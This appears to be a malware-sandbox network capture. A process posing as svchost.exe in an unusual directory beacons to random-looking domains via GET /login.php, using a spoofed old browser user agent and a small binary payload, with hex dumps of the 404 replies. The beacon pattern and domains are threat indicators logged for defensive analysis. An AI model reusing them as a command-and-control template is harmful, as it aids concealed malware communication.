                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:49:01.674352884 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.104231119 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.449654188.114.96.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC761INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:02 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W2LPnI%2FmslKKxs3EOeWkxA5EJ5Ee0hsx49puHp4udNgQWXUwT4jBNZ26XWZRal3IhTXEMZExz0v2z0uFjm8vzKIYnCviToMj1rvtVV5ZwNFRn%2FSe8%2FMkoOh5f%2BDTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9506ab12c326-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC608INData Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65
                                                                                                                                                                                                              Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66
                                                                                                                                                                                                              Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b
                                                                                                                                                                                                              Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73
                                                                                                                                                                                                              Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32
                                                                                                                                                                                                              Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65
                                                                                                                                                                                                              Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74
                                                                                                                                                                                                              Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
                                                                                                                                                                                                              2024-08-23 16:47:02 UTC1369INData Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22
                                                                                                                                                                                                              Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.449661188.114.96.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:04 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:04 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:05 UTC759INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:05 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FiBHz1heGVZxchx3O08cZeZiPF8xkUf9Kj6hBDnm0aimNVpIWumT5JEOU0Ap93qO6Nd%2FeVLYEwIKkbbx2TAHKhOiukZG6X0ir15M3I%2Fu6xI4rF2CEHDkzVAXPXZNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c95161e647d0c-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              2024-08-23 16:47:05 UTC610INData Raw: 37 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7cb9<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-08-23 16:47:05 UTC1369INData Raw: 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 67 79
                                                                                                                                                                                                              Data Ascii: title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qegy


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              2192.168.2.451114188.114.97.34436720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-08-23 16:47:17 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-08-23 16:47:17 UTC6OUTData Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              2024-08-23 16:47:19 UTC897INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:47:19 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="98.5",amp_style_sanitizer;dur="34.1",amp_tag_and_attribute_sanitizer;dur="37.1",amp_optimizer;dur="24.4"
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CI3bpSNHDFuGNYd0oJ4jHNzvNm3TPa3FbKdcEidsTuDrpD4IjMpHhhbfmuTgeW7J%2BuGSLPcXxIiDjJqwisfGAm9QFBvubWP2cNcsOKSg59owJaPtUmcr%2F4CZygYnVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c9565cf78422b-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
